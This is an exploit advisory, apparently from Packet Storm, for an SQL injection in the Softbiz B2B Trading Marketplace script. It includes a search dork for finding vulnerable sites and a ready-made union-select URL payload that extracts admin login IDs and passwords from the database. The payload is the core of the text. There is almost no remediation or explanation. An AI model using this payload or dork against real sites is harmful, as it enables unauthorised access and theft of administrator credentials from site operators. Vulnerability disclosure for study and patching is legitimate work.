The Softbiz B2B Trading Marketplace script suffers from a remote SQL injection vulnerability.
f49bf09a5ac9756e14ab3a04629d45aab0c9164ebddf3cd251087ce538aad748# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Date :15/4/2010
# Author : AnGrY BoY
# Contact: h4kurd@hotmail.com & h4kurd@yahoo.com
# Home : http://www.kurd-security.com
# Software Link : N/A
# Version : Softbiz B2B trading Marketplace Script
# Tested on : windows SP2
# CVE : 0
# Dork : buyers_subcategories.php?IndustryID=
# expolit:
# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
=============================================
# Gre3tZ :- all kurd-security members
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed